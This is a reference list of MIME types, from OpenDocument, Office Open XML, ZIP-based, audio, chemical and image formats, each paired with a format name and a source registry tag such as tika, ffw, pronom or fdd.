application/x-vnd.oasis.opendocument.graphicsOpenDocument v1.0: Graphics document (Drawing) tika
application/x-vnd.oasis.opendocument.graphics-templateOpenDocument v1.0: Graphics document used as template tika
application/x-vnd.oasis.opendocument.imageOpenDocument v1.0: Image document tika
application/x-vnd.oasis.opendocument.image-templateOpenDocument v1.0: Image document used as template tika
application/x-vnd.oasis.opendocument.presentationOpenDocument v1.0: Presentation document tika
application/x-vnd.oasis.opendocument.presentation-templateOpenDocument v1.0: Presentation document used as template tika
application/x-vnd.oasis.opendocument.spreadsheetOpenDocument v1.0: Spreadsheet document tika
application/x-vnd.oasis.opendocument.spreadsheet-templateOpenDocument v1.0: Spreadsheet document used as template tika
application/x-vnd.oasis.opendocument.textOpenDocument v1.0: Text document tika
application/x-vnd.oasis.opendocument.text-masterOpenDocument v1.0: Global Text document tika
application/x-vnd.oasis.opendocument.text-templateOpenDocument v1.0: Text document used as template tika
application/x-vnd.oasis.opendocument.text-webOpenDocument v1.0: Text document used as template for HTML documents tika
application/x-vnd.sun.xml.writerOpenOffice v1.0: Writer Document tika
application/x-votable+xmlVOTable ffw
application/x-wais-sourceapplication/x-wais-source tika
application/x-web-app-manifest+jsonOpen Web App Manifest ffw
application/x-www-form-urlencodedForm URL encoding ffw
application/x-x509-ca-certDER encoded certificate ffw
application/x-x509-ca-cert tika
application/x-x509-user-certDER encoded certificate ffw
application/x-xfigapplication/x-xfig tika
application/x-xpinstallCross-Platform Installer Module ffw
application/x-xpinstall tika
application/x-xzXZ ffw
application/x-xz tika
application/x-zip-compressedCompressed Archive File tika
application/x-zooZoo ffw
application/x-zoo tika
application/x400-bpapplication/x400-bp tika
application/xcap-att+xmlapplication/xcap-att+xml tika
application/xcap-caps+xmlapplication/xcap-caps+xml tika
application/xcap-el+xmlapplication/xcap-el+xml tika
application/xcap-error+xmlapplication/xcap-error+xml tika
application/xcap-ns+xmlapplication/xcap-ns+xml tika
application/xcon-conference-info+xmlapplication/xcon-conference-info+xml tika
application/xcon-conference-info-diff+xmlapplication/xcon-conference-info-diff+xml tika
application/xenc+xmlapplication/xenc+xml tika
application/xhtml+xmlHTML ffw
application/xhtml+xml tika
HyperText Markup Language (HTML) 5 fdd
Extensible HyperText Markup Language (XHTML), 1.0 fdd
—  application/xhtml+xml; version=”1.0″Extensible Hypertext Markup Language 1.0 pronom
—  application/xhtml+xml; version=”1.1″Extensible Hypertext Markup Language 1.1 pronom
application/xhtml-voice+xmlapplication/xhtml-voice+xml tika
application/xml-external-parsed-entityapplication/xml-external-parsed-entity tika
application/xmpp+xmlapplication/xmpp+xml tika
application/xop+xmlapplication/xop+xml tika
application/xslfo+xmlXSL Format tika
application/xslt+xmlXSL Transformations tika
application/xspf+xmlXML Shareable Playlist Format tika
application/xv+xmlapplication/xv+xml tika
application/zipZIP ffw
Compressed Archive File tika
ZIP Format pronom
ZIP File Format (PKWARE) fdd
ZIP File Format, Version 6.3.3 (PKWARE) fdd
Document Container File: Core (based on ZIP 6.3.3) fdd
ZIP File Format, Version 6.2.0 (PKWARE) fdd
—  application/bizagi-modelerBizAgi Process Modeler tika
—  application/java-archiveJava Archive tika
Java Archive Format pronom
— —  application/vnd.android.package-archiveapplication/vnd.android.package-archive tika
— —  application/x-tika-java-enterprise-archiveapplication/x-tika-java-enterprise-archive tika
— —  application/x-tika-java-web-archiveapplication/x-tika-java-web-archive tika
—  application/vnd.apple.iworkapplication/vnd.apple.iwork tika
— —  application/vnd.apple.keynoteapplication/vnd.apple.keynote tika
— —  application/vnd.apple.numbersapplication/vnd.apple.numbers tika
— —  application/vnd.apple.pagesapplication/vnd.apple.pages tika
— —  application/x-tika-iworks-protectedPassword Protected iWorks File tika
—  application/vnd.etsi.asic-e+zipExtended Associated Signature Container tika
—  application/vnd.etsi.asic-s+zipSimple Associated Signature Container tika
—  application/vnd.google-earth.kmzKML ffw
application/vnd.google-earth.kmz tika
Keyhole Markup Language (Container) pronom
—  application/vnd.mindjet.mindmanagerMindManager tika
—  application/vnd.oasis.opendocument.formulaOpenDocument ffw
OpenDocument v1.0: Formula document tika
—  application/x-itunes-ipaApple iOS IPA AppStore file tika
—  application/x-tika-ooxmlapplication/x-tika-ooxml tika
— —  application/oxpsOpenXPS ffw
Open XML Paper Specification tika
Open XML Paper Specification pronom
Open XML Paper Specification, (OpenXPS), ECMA-388 (.oxps) fdd
— —  application/vnd.ms-excel.addin.macroenabled.12Microsoft Excel ffw
Office Open XML Workbook Add-in (macro-enabled) tika
— —  application/vnd.ms-excel.sheet.binary.macroenabled.12Microsoft Excel ffw
Microsoft Excel 2007 Binary Spreadsheet tika
Microsoft Excel Binary (XLSB) Format (option in Excel 2007 and later) fdd
— —  application/vnd.ms-excel.sheet.macroenabled.12Microsoft Excel ffw
Office Open XML Workbook (macro-enabled) tika
— —  application/vnd.ms-excel.template.macroenabled.12Microsoft Excel ffw
Office Open XML Workbook Template (macro-enabled) tika
— —  application/vnd.ms-powerpoint.addin.macroenabled.12Microsoft PowerPoint ffw
Office Open XML Presentation Add-in (macro-enabled) tika
— —  application/vnd.ms-powerpoint.presentation.macroenabled.12Microsoft PowerPoint ffw
Office Open XML Presentation (macro-enabled) tika
— —  application/vnd.ms-powerpoint.slide.macroenabled.12Microsoft PowerPoint ffw
application/vnd.ms-powerpoint.slide.macroenabled.12 tika
— —  application/vnd.ms-powerpoint.slideshow.macroenabled.12Microsoft PowerPoint ffw
Office Open XML Presentation Slideshow (macro-enabled) tika
— —  application/vnd.ms-powerpoint.template.macroenabled.12Microsoft PowerPoint ffw
application/vnd.ms-powerpoint.template.macroenabled.12 tika
— —  application/vnd.ms-word.document.macroenabled.12Microsoft Word ffw
Office Open XML Document (macro-enabled) tika
— —  application/vnd.ms-word.template.macroenabled.12Microsoft Word ffw
Office Open XML Document Template (macro-enabled) tika
— —  application/vnd.ms-xpsdocumentOpenXPS ffw
Open XML Paper Specification tika
Microsoft XML Paper Specification, (XPS) fdd
— —  application/vnd.openxmlformats-officedocument.presentationml.presentationPPTX ffw
Microsoft PowerPoint ffw
Office Open XML Presentation tika
PPTX Strict (Office Open XML), ISO 29500-1: 2008-2016 fdd
PPTX Transitional (Office Open XML), ISO 29500:2008-2016, ECMA-376, Editions 1-5 fdd
— — —  application/vnd.openxmlformats-officedocument.presentationml.presentation; version=”2007 onwards”Microsoft Powerpoint for Windows 2007 onwards pronom
— —  application/vnd.openxmlformats-officedocument.presentationml.slideapplication/vnd.openxmlformats-officedocument.presentationml.slide tika
— —  application/vnd.openxmlformats-officedocument.presentationml.slideshowMicrosoft PowerPoint ffw
Office Open XML Presentation Slideshow tika
PPTX Transitional (Office Open XML), ISO 29500:2008-2016, ECMA-376, Editions 1-5 fdd
— — —  application/vnd.openxmlformats-officedocument.presentationml.slideshow; version=”2007″Microsoft PowerPoint Show 2007 pronom
— —  application/vnd.openxmlformats-officedocument.presentationml.templateMicrosoft PowerPoint ffw
Office Open XML Presentation Template tika
— — —  application/vnd.openxmlformats-officedocument.presentationml.template; version=”2007″Microsoft PowerPoint Template 2007 pronom
— —  application/vnd.openxmlformats-officedocument.spreadsheetml.sheetXLSX ffw
Microsoft Excel ffw
Office Open XML Workbook tika
XLSX Transitional (Office Open XML), ISO 29500:2008-2016, ECMA-376, Editions 1-5 fdd
XLSX Strict (Office Open XML), ISO 29500-1:2008-2016 fdd
— — —  application/vnd.openxmlformats-officedocument.spreadsheetml.sheet; version=”2007 onwards”Microsoft Excel for Windows 2007 onwards pronom
— —  application/vnd.openxmlformats-officedocument.spreadsheetml.templateMicrosoft Excel ffw
Office Open XML Workbook Template tika
— — —  application/vnd.openxmlformats-officedocument.spreadsheetml.template; version=”2007 onwards”Microsoft Excel Template 2007 onwards pronom
— —  application/vnd.openxmlformats-officedocument.wordprocessingml.documentDOCX ffw
Microsoft Word ffw
Office Open XML Document tika
OOXML Format Family — ISO/IEC 29500 and ECMA 376 fdd
DOCX Transitional (Office Open XML), ISO 29500:2008-2016, ECMA-376, Editions 1-5 fdd
DOCX Strict (Office Open XML), ISO 29500-1: 2008-2016 fdd
— — —  application/vnd.openxmlformats-officedocument.wordprocessingml.document; version=”2007 onwards”Microsoft Word for Windows 2007 onwards pronom
— —  application/vnd.openxmlformats-officedocument.wordprocessingml.templateMicrosoft Word ffw
Office Open XML Document Template tika
— — —  application/vnd.openxmlformats-officedocument.wordprocessingml.template; version=”2007 onwards”Microsoft Word Template 2007 onwards pronom
— —  application/x-tika-ooxml-protectedPassword Protected OOXML File tika
— —  application/x-tika-visio-ooxmlVisio OOXML File tika
— — —  application/vnd.ms-visio.drawingOffice Open XML Visio Drawing (macro-free) tika
Visio VSDX Drawing File Format fdd
Visio VSDX Drawing File Format fdd
— — —  application/vnd.ms-visio.drawing.macroenabled.12Office Open XML Visio Drawing (macro-enabled) tika
— — —  application/vnd.ms-visio.stencilOffice Open XML Visio Stencil (macro-free) tika
— — —  application/vnd.ms-visio.stencil.macroenabled.12Office Open XML Visio Stencil (macro-enabled) tika
— — —  application/vnd.ms-visio.templateOffice Open XML Visio Template (macro-free) tika
— — —  application/vnd.ms-visio.template.macroenabled.12Office Open XML Visio Template (macro-enabled) tika
— —  model/vnd.dwfx+xpsAutoCAD Design Web Format tika
—  application/x-vnd.oasis.opendocument.formulaOpenDocument v1.0: Formula document tika
—  application/x-xmindXMind Pro tika
application/zlibZLIB Compressed Data Format tika
application/zstdZstandard ffw
audio/32kadpcmaudio/32kadpcm tika
audio/3gpp3GP ffw
audio/3gpp tika
3GPP Audio/Video File pronom
AMR, Adaptive Multi-Rate Speech Codec fdd
audio/3gpp23G2 ffw
audio/3gpp2 tika
audio/8svx8-Bit Sampled Voice ffw
audio/ac3audio/ac3 tika
Dolby Digital AC-3 pronom
AC-3 Compressed Audio (Dolby Digital), Revision A fdd
audio/adpcmaudio/adpcm tika
audio/aiffAIFF ffw
Audio Interchange File Format tika
AIFF (Audio Interchange File Format) fdd
AIFF File Format with LPCM Audio fdd
audio/amrAdaptive Multi-Rate Audio ffw
audio/amr tika
Adaptive Multi-Rate Audio pronom
AMR, Adaptive Multi-Rate Speech Codec fdd
—  audio/amr-wbaudio/amr-wb tika
Adaptive Multi-Rate Wideband Audio pronom
AMR-WB, Adaptive Multi-Rate – Wideband Speech Codec fdd
—  audio/amr-wb+audio/amr-wb+ tika
AMR-WB+, Extended Adaptive Multi-Rate – Wideband Speech Codec fdd
audio/application/x-pn-realmediaRealMedia ffw
audio/ascaudio/asc tika
audio/asfASF (Advanced Systems Format) fdd
audio/audibleAudible.Com File Format fdd
audio/aviAVI (Audio Video Interleaved) File Format fdd
audio/basicAU ffw
uLaw/AU Audio File tika
NeXT/Sun sound pronom
audio/bv16audio/bv16 tika
audio/bv32audio/bv32 tika
audio/clearmodeaudio/clearmode tika
audio/cnaudio/cn tika
audio/dat12audio/dat12 tika
audio/dlsaudio/dls tika
Downloadable Sounds Audio pronom
audio/dsr-es201108audio/dsr-es201108 tika
audio/dsr-es202050audio/dsr-es202050 tika
audio/dsr-es202211audio/dsr-es202211 tika
audio/dsr-es202212audio/dsr-es202212 tika
audio/dvi4audio/dvi4 tika
audio/eac3audio/eac3 tika
audio/evrcaudio/evrc tika
audio/evrc-qcpaudio/evrc-qcp tika
audio/evrc0audio/evrc0 tika
audio/evrc1audio/evrc1 tika
audio/evrcbaudio/evrcb tika
audio/evrcb0audio/evrcb0 tika
audio/evrcb1audio/evrcb1 tika
audio/evrcwbaudio/evrcwb tika
audio/evrcwb0audio/evrcwb0 tika
audio/evrcwb1audio/evrcwb1 tika
audio/exampleaudio/example tika
audio/flacFLAC ffw
FLAC (Free Lossless Audio Codec), Version 1.1.2 fdd
audio/g719audio/g719 tika
audio/g722audio/g722 tika
audio/g7221audio/g7221 tika
audio/g723audio/g723 tika
audio/g726-16audio/g726-16 tika
audio/g726-24audio/g726-24 tika
audio/g726-32audio/g726-32 tika
audio/g726-40audio/g726-40 tika
audio/g728audio/g728 tika
audio/g729audio/g729 tika
audio/g7291audio/g7291 tika
audio/g729daudio/g729d tika
audio/g729eaudio/g729e tika
audio/gsmaudio/gsm tika
audio/gsm-efraudio/gsm-efr tika
audio/ilbcaudio/ilbc tika
audio/itModule Music Formats (Mods) fdd
audio/l16audio/l16 tika
audio/l20audio/l20 tika
audio/l24audio/l24 tika
audio/l8audio/l8 tika
audio/lpcaudio/lpc tika
audio/mMIDI ffw
audio/mStandard MIDI File Format fdd
audio/medModule Music Formats (Mods) fdd
audio/midMIDI ffw
Standard MIDI File Format fdd
RIFF-based MIDI File Format fdd
audio/midiMIDI ffw
Musical Instrument Digital Interface tika
MIDI Audio pronom
audio/midiStandard MIDI File Format fdd
audio/mobile-xmfaudio/mobile-xmf tika
Mobile eXtensible Music Format pronom
XMF, eXtensible Music File Format, Version 1.0 fdd
audio/modModule Music Formats (Mods) fdd
audio/mp3MP3 File Format fdd
audio/mp4MP4 ffw
audio/mp4 tika
MPEG-4 File Format, Version 2 fdd
audio/mp4a-latmaudio/mp4a-latm tika
audio/mpaMPEG Audio Layer I ffw
MPEG Audio Layer II ffw
audio/mpa tika
MPEG-1 and MPEG-2 Layer II Audio Encoding fdd
audio/mpa-robustaudio/mpa-robust tika
audio/mpegMP3 ffw
MPEG-1 ffw
MPEG Audio Layer I ffw
MPEG Audio Layer II ffw
MPEG-1 Audio Layer 3 tika
MPEG 1/2 Audio Layer 3 Streaming pronom
MPEG 1/2 Audio Layer 3 pronom
MPEG Audio Stream, Layer II pronom
MPEG 1/2 Audio Layer I pronom
DTB (Digital Talking Book), 2005 fdd
MPEG-1 and MPEG-2 Layer II Audio Encoding fdd
MP3 File Format fdd
audio/mpeg3MP3 File Format fdd
audio/mpeg4-genericaudio/mpeg4-generic tika
DTB (Digital Talking Book), 2005 fdd
audio/mpgMP3 File Format fdd
audio/ogg; codecs=speexSpeex Audio Codec, Version 1.2 fdd
Ogg Speex Audio Format fdd
audio/parityfecaudio/parityfec tika
audio/pcmaaudio/pcma tika
audio/pcma-wbaudio/pcma-wb tika
audio/pcmuaudio/pcmu tika
audio/pcmu-wbaudio/pcmu-wb tika
audio/prs.sidSID ffw
audio/prs.sid tika
Real SID Audio pronom
—  audio/prs.sid; version=”1″Play SID Audio 1 pronom
—  audio/prs.sid; version=”2″Play SID Audio 2 pronom
audio/qcelpaudio/qcelp tika
QCP Audio File Format pronom
audio/redaudio/red tika
audio/rtp-enc-aescm128audio/rtp-enc-aescm128 tika
audio/rtp-midiaudio/rtp-midi tika
audio/rtxaudio/rtx tika
audio/s3mModule Music Formats (Mods) fdd
audio/smvaudio/smv tika
audio/smv-qcpaudio/smv-qcp tika
audio/smv0audio/smv0 tika
audio/sp-midiaudio/sp-midi tika
audio/t140caudio/t140c tika
audio/t38audio/t38 tika
audio/telephone-eventaudio/telephone-event tika
audio/toneaudio/tone tika
audio/tta; version=”1″True Audio 1 pronom
audio/tta; version=”2″True Audio 2 pronom
audio/ulpfecaudio/ulpfec tika
audio/vdviaudio/vdvi tika
audio/vmr-wbaudio/vmr-wb tika
audio/vnd.3gpp.iufpaudio/vnd.3gpp.iufp tika
audio/vnd.4sbaudio/vnd.4sb tika
audio/vnd.adobe.soundboothaudio/vnd.adobe.soundbooth tika
audio/vnd.audiokozaudio/vnd.audiokoz tika
audio/vnd.celpaudio/vnd.celp tika
audio/vnd.cisco.nseaudio/vnd.cisco.nse tika
audio/vnd.cmles.radio-eventsaudio/vnd.cmles.radio-events tika
audio/vnd.cns.anp1audio/vnd.cns.anp1 tika
audio/vnd.cns.inf1audio/vnd.cns.inf1 tika
audio/vnd.digital-windsaudio/vnd.digital-winds tika
audio/vnd.dlna.adtsaudio/vnd.dlna.adts tika
audio/vnd.dolby.heaac.1audio/vnd.dolby.heaac.1 tika
audio/vnd.dolby.heaac.2audio/vnd.dolby.heaac.2 tika
audio/vnd.dolby.mlpaudio/vnd.dolby.mlp tika
Dolby MLP Lossless Audio pronom
audio/vnd.dolby.mpsaudio/vnd.dolby.mps tika
audio/vnd.dolby.pl2audio/vnd.dolby.pl2 tika
audio/vnd.dolby.pl2xaudio/vnd.dolby.pl2x tika
audio/vnd.dolby.pl2zaudio/vnd.dolby.pl2z tika
audio/vnd.dtsaudio/vnd.dts tika
DTS Coherent Acoustics (DCA) Audio pronom
audio/vnd.dts.hdaudio/vnd.dts.hd tika
audio/vnd.everad.pljaudio/vnd.everad.plj tika
audio/vnd.hns.audioaudio/vnd.hns.audio tika
audio/vnd.lucent.voiceaudio/vnd.lucent.voice tika
audio/vnd.ms-playready.media.pyaaudio/vnd.ms-playready.media.pya tika
audio/vnd.nokia.mobile-xmfaudio/vnd.nokia.mobile-xmf tika
audio/vnd.nortel.vbkaudio/vnd.nortel.vbk tika
audio/vnd.nuera.ecelp4800audio/vnd.nuera.ecelp4800 tika
audio/vnd.nuera.ecelp7470audio/vnd.nuera.ecelp7470 tika
audio/vnd.nuera.ecelp9600audio/vnd.nuera.ecelp9600 tika
audio/vnd.octel.sbcaudio/vnd.octel.sbc tika
audio/vnd.qcelpaudio/vnd.qcelp tika
audio/vnd.rhetorex.32kadpcmaudio/vnd.rhetorex.32kadpcm tika
audio/vnd.rn-realaudioRealAudio ffw
RealAudio Metafile pronom
RealAudio, Version 10 fdd
—  audio/vnd.rn-realaudio; version=”3″RealAudio 3 pronom
audio/vnd.sealedmedia.softseal.mpegaudio/vnd.sealedmedia.softseal.mpeg tika
audio/vnd.vmx.cvsdaudio/vnd.vmx.cvsd tika
audio/vnd.waveWAV ffw
WAVE Audio File Format fdd
audio/vorbis-configaudio/vorbis-config tika
audio/wavWAV ffw
WAVE Audio File Format fdd
audio/waveWAV ffw
WAVE Audio File Format fdd
audio/webmWebM ffw
WebM fdd
audio/x-8svx8-Bit Sampled Voice ffw
audio/x-aacaudio/x-aac tika
audio/x-adbcmaudio/x-adbcm tika
audio/x-aiffAIFF ffw
Audio Interchange File Format tika
Audio Interchange File Format (compressed) pronom
AIFF (Audio Interchange File Format) fdd
AIFF File Format with LPCM Audio fdd
audio/x-amr-wbAdaptive Multi-Rate WideBand Audio ffw
audio/x-dec-adbcmaudio/x-dec-adbcm tika
audio/x-dec-basicaudio/x-dec-basic tika
audio/x-flacFLAC ffw
Free Lossless Audio Codec tika
audio/x-m4aaudio/mp4 tika
audio/x-matroskaMatroska Multimedia Container fdd
Matroska Multimedia Container fdd
audio/x-midiMIDI ffw
audio/x-midiStandard MIDI File Format fdd
audio/x-modEPSGMOD ffw
audio/x-mod tika
Module Music Formats (Mods) fdd
audio/x-mp3MP3 File Format fdd
audio/x-mp4aaudio/mp4 tika
audio/x-mpegMPEG-1 Audio Layer 3 tika
MP3 File Format fdd
audio/x-mpeg3MP3 File Format fdd
audio/x-mpegaudioMP3 File Format fdd
audio/x-mpegurlMP3 Playlist File tika
audio/x-mpgMP3 File Format fdd
audio/x-ms-waxWindows Media Metafile ffw
audio/x-ms-wax tika
audio/x-oggOgg File Format fdd
Ogg Vorbis Audio Format fdd
audio/x-pn-audibleaudioAudible.Com File Format fdd
audio/x-pn-realaudioRealAudio ffw
RAM (RealAudio) ffw
Real Audio tika
RealAudio Metafile pronom
audio/x-pn-realaudio-pluginRAM (RealAudio) ffw
RealMedia Player Plug-in tika
audio/x-pn-wavWAV ffw
WAVE Audio File Format fdd
audio/x-realaudioReal Audio tika
audio/x-s3mModule Music Formats (Mods) fdd
audio/x-speexSpeex Audio Codec, Version 1.2 fdd
Ogg Speex Audio Format fdd
audio/x-vocCreative Voice File ffw
audio/x-wavWAV ffw
BWF ffw
audio/x-wav tika
Waveform Audio pronom
Waveform Audio (PCMWAVEFORMAT) pronom
Waveform Audio (WAVEFORMATEX) pronom
Waveform Audio (WAVEFORMATEXTENSIBLE) pronom
WAVE Audio File Format fdd
DTB (Digital Talking Book), 2005 fdd
—  audio/x-wav; version=”0 generic”Broadcast WAVE 0 Generic pronom
—  audio/x-wav; version=”0 mpeg encoding”Broadcast WAVE 0 MPEG Encoding pronom
—  audio/x-wav; version=”0 pcm encoding”Broadcast WAVE 0 PCM Encoding pronom
—  audio/x-wav; version=”0 waveformatextensible encoding”Broadcast WAVE 0 WAVEFORMATEXTENSIBLE Encoding pronom
—  audio/x-wav; version=”1 generic”Broadcast WAVE 1 Generic pronom
—  audio/x-wav; version=”1 mpeg encoding”Broadcast WAVE 1 MPEG Encoding pronom
—  audio/x-wav; version=”1 pcm encoding”Broadcast WAVE 1 PCM Encoding pronom
—  audio/x-wav; version=”1 waveformatextensible encoding”Broadcast WAVE 1 WAVEFORMATEXTENSIBLE Encoding pronom
—  audio/x-wav; version=”2 generic”Broadcast WAVE 2 Generic pronom
—  audio/x-wav; version=”2 mpeg encoding”Broadcast WAVE 2 MPEG Encoding pronom
—  audio/x-wav; version=”2 pcm encoding”Broadcast WAVE 2 PCM Encoding pronom
—  audio/x-wav; version=”2 waveformatextensible encoding”Broadcast WAVE 2 WAVEFORMATEXTENSIBLE Encoding pronom
—  audio/x-wav; version=”2.0″Exchangeable Image File Format (Audio) 2.0 pronom
—  audio/x-wav; version=”2.1″Exchangeable Image File Format (Audio) 2.1 pronom
—  audio/x-wav; version=”2.2″Exchangeable Image File Format (Audio) 2.2 pronom
audio/x-xmModule Music Formats (Mods) fdd
audio/xmExtended Module Audio File pronom
Module Music Formats (Mods) fdd
chemical/x-cdxchemical/x-cdx tika
Chemical Draw Exchange Format pronom
chemical/x-cifCIF ffw
chemical/x-cif tika
chemical/x-cmdfchemical/x-cmdf tika
chemical/x-cmlCML ffw
chemical/x-cml tika
chemical/x-csmlchemical/x-csml tika
chemical/x-mdl-molfileMOL ffw
chemical/x-pdbBrookhaven Protein Databank File tika
chemical/x-xyzchemical/x-xyz tika
drawing/dwgDWG ffw
AutoCad Drawing tika
gzip/documentGzip Compressed Archive tika
image/ascii-artASCII Art ffw
image/aviAVI (Audio Video Interleaved) File Format fdd
image/avifAVIF ffw
image/avif-sequenceAVIF ffw
image/bmpBMP ffw
Windows bitmap tika
Bitmap Image File (BMP), Version 5 fdd
—  image/bmp; version=”1.0″Windows Bitmap 1.0 pronom
—  image/bmp; version=”2.0″OS/2 Bitmap 2.0 pronom
Windows Bitmap 2.0 pronom
—  image/bmp; version=”3.0 nt”Windows Bitmap 3.0 NT pronom
—  image/bmp; version=”3.0″Windows Bitmap 3.0 pronom
—  image/bmp; version=”4.0″Windows Bitmap 4.0 pronom
—  image/bmp; version=”5.0″Windows Bitmap 5.0 pronom
image/cgmCGM ffw
Computer Graphics Metafile tika
Computer Graphics Metafile (CGM) File Format Family fdd
—  image/cgm; version=”1″Computer Graphics Metafile ASCII 1 pronom
—  image/cgm; version=”3″Computer Graphics Metafile ASCII 3 pronom
—  image/cgm; version=”4″Computer Graphics Metafile ASCII 4 pronom
—  image/cgm; version=1; version=”1″Computer Graphics Metafile (Binary) 1 pronom
—  image/cgm; version=2; version=”2″Computer Graphics Metafile (Binary) 2 pronom
—  image/cgm; version=3; version=”3″Computer Graphics Metafile (Binary) 3 pronom
—  image/cgm; version=4; version=”4″Computer Graphics Metafile (Binary) 4 pronom
image/cis-codLightning Strike ffw
image/dicom-rleDICOM ffw
image/emfEnhanced Metafile ffw
—  image/emf; version=”1.0″Microsoft Windows Enhanced Metafile 1.0 pronom
—  image/emf; version=”2.0″Microsoft Windows Enhanced Metafile 2.0 pronom
—  image/emf; version=”3.0″Microsoft Windows Enhanced Metafile 3.0 pronom
image/exampleimage/example tika
image/flifFree Lossless Image Format (FLIF) pronom
image/g3faxCCITT Group 3 ffw
image/g3fax tika
image/gifGIF ffw
Graphics Interchange Format tika
GIF Graphics Interchange Format, Version 89a fdd
—  image/gif; version=”87a”Graphics Interchange Format 87a pronom
—  image/gif; version=”89a”Graphics Interchange Format 89a pronom
image/heicHEIF ffw
High Efficiency Image File Format, HEIC/HEIX brands fdd
High Efficiency Image File (HEIF) Format, MPEG-H Part 12 fdd
image/heic-sequenceHigh Efficiency Image File Format, HEIC/HEIX brands fdd
image/heifHEIF ffw
High Efficiency Image File (HEIF) Format, MPEG-H Part 12 fdd
image/iefImage Exchange Format ffw
image/ief tika
image/image/x-ptxPentax PEF ffw
image/ivgIconVG ffw
image/jlsJPEG-LS ffw
image/jpegJPEG ffw
JFIF ffw
SPIFF ffw
Joint Photographic Experts Group tika
Raw JPEG Stream pronom
JFIF, JPEG File Interchange Format, Version 1.02 fdd
SPIFF, Still Picture Interchange File Format fdd
—  image/jpeg; version=”1.0″Still Picture Interchange File Format 1.0 pronom
—  image/jpeg; version=”1.00″JPEG File Interchange Format 1.00 pronom
—  image/jpeg; version=”1.01″JPEG File Interchange Format 1.01 pronom
—  image/jpeg; version=”1.02″JPEG File Interchange Format 1.02 pronom
—  image/jpeg; version=”2.0″Still Picture Interchange File Format 2.0 pronom
Exchangeable Image File Format (Compressed) 2.0 pronom
—  image/jpeg; version=”2.1″Exchangeable Image File Format (Compressed) 2.1 pronom
—  image/jpeg; version=”2.2″Exchangeable Image File Format (Compressed) 2.2 pronom
—  image/jpeg; version=”2.2.1″Exchangeable Image File Format (Compressed) 2.2.1 pronom
image/jpeg2000JPEG 2000 Part 1 (Core) jp2 File Format fdd
image/jpeg2000-imageJPEG 2000 Part 1 (Core) jp2 File Format fdd
image/jpgJFIF, JPEG File Interchange Format, Version 1.02 fdd
image/jxlJPEG XL ffw
image/jxrJPEG Extended Range pronom
JPEG XR File Format (JXR) fdd
image/ktxKTX ffw
Khronos Texture File pronom
image/movQuickTime File Format fdd
image/naplpsNAPLPS ffw
image/naplps tika
image/niaNaïve Image Formats ffw
image/nieNaïve Image Formats ffw
image/niiNaïve Image Formats ffw
image/nitfimage/nitf tika
image/ntfimage/nitf tika
image/openrasterOpenRaster ffw
OpenRaster Image Format pronom
image/pictPICT ffw
image/pngPNG ffw
APNG ffw
Portable Network Graphics tika
PNG, Portable Network Graphics fdd
—  image/png; version=”1.0″Portable Network Graphics 1.0 pronom
—  image/png; version=”1.1″Portable Network Graphics 1.1 pronom
—  image/png; version=”1.2″Portable Network Graphics 1.2 pronom
image/png+jsonPiskel canvas ffw
image/prs.btifimage/prs.btif tika
image/prs.ptiimage/prs.pti tika
image/pwg-rasterPWG Raster ffw
image/svg-xmlScalable Vector Graphics (SVG) File Format Family fdd
Scalable Vector Graphics (SVG), Version 1.1 fdd
image/t38image/t38 tika
image/tifTIFF, Revision 6.0 fdd
image/tiffTIFF ffw
Tagged Image File Format tika
Tagged Image File Format for Image Technology (TIFF/IT) pronom
Tagged Image File Format for Electronic Photography (TIFF/EP) pronom
Geographic Tagged Image File Format (GeoTIFF) pronom
Tagged Image File Format for Internet Fax (TIFF-FX) pronom
Tagged Image File Format pronom
TIFF Uncompressed File with Exif Metadata fdd
Digital Raster Graphic as TIFF fdd
Adobe Digital Negative (DNG), Version 1.1 fdd
BigTIFF fdd
GeoTIFF, Revision 1.0 fdd
TIFF, Revision 6.0 fdd
—  image/tiff; version=”1.0″Digital Negative Format (DNG) 1.0 pronom
—  image/tiff; version=”1.1″Digital Negative Format (DNG) 1.1 pronom
—  image/tiff; version=”1.3″Digital Negative Format (DNG) 1.3 pronom
—  image/tiff; version=”1.4″Digital Negative Format (DNG) 1.4 pronom
—  image/tiff; version=”2.0″Exchangeable Image File Format (Uncompressed) 2.0 pronom
—  image/tiff; version=”2.1″Exchangeable Image File Format (Uncompressed) 2.1 pronom
—  image/tiff; version=”2.2″Exchangeable Image File Format (Uncompressed) 2.2 pronom
image/tiff-fxTIFF-FX ffw
image/tiff-fx tika
image/vnd-svf; version=”1″Simple Vector Format 1 pronom
image/vnd-svf; version=”2″Simple Vector Format 2 pronom
image/vnd-wap-wbmpWireless Bitmap pronom
image/vnd.adobe.photoshopPSD ffw
Photoshop Image tika
Adobe Photoshop pronom
Adobe Photoshop Large Document Format pronom
Adobe Photoshop Family fdd
Adobe Photoshop Family fdd
image/vnd.cns.inf2image/vnd.cns.inf2 tika
image/vnd.djvuDjVu ffw
image/vnd.djvu tika
DjVu File Format pronom
Secure DjVU pronom
image/vnd.dwgDWG ffw
AutoCad Drawing tika
DWG (AutoCAD Drawing) Format Family fdd
—  image/vnd.dwg; version=”1.0″AutoCAD Drawing 1.0 pronom
—  image/vnd.dwg; version=”1.2″AutoCAD Drawing 1.2 pronom
—  image/vnd.dwg; version=”1.3″AutoCAD Drawing 1.3 pronom
—  image/vnd.dwg; version=”1.4″AutoCAD Drawing 1.4 pronom
—  image/vnd.dwg; version=”2.0″AutoCAD Drawing 2.0 pronom
—  image/vnd.dwg; version=”2.1″AutoCAD Drawing 2.1 pronom
—  image/vnd.dwg; version=”2.2″AutoCAD Drawing 2.2 pronom
—  image/vnd.dwg; version=”2.5″AutoCAD Drawing 2.5 pronom
—  image/vnd.dwg; version=”2.6″AutoCAD Drawing 2.6 pronom
—  image/vnd.dwg; version=”2000-2002″AutoCAD Drawing 2000-2002 pronom
—  image/vnd.dwg; version=”2004-2005″AutoCAD Drawing 2004-2005 pronom
—  image/vnd.dwg; version=”2007-2008″AutoCAD Drawing 2007-2008 pronom
—  image/vnd.dwg; version=”2010/2011/2012″AutoCAD Drawing 2010/2011/2012 pronom
—  image/vnd.dwg; version=”2013/2014″AutoCAD Drawing 2013/2014 pronom
—  image/vnd.dwg; version=”r10″AutoCAD Drawing R10 pronom
—  image/vnd.dwg; version=”r11/12″AutoCAD Drawing R11/12 pronom
—  image/vnd.dwg; version=”r13″AutoCAD Drawing R13 pronom
—  image/vnd.dwg; version=”r14″AutoCAD Drawing R14 pronom
—  image/vnd.dwg; version=”r9″AutoCAD Drawing R9 pronom
image/vnd.dxbAutoCAD DXF simplified Binary tika
image/vnd.dxfDXF ffw
AutoCAD DXF tika
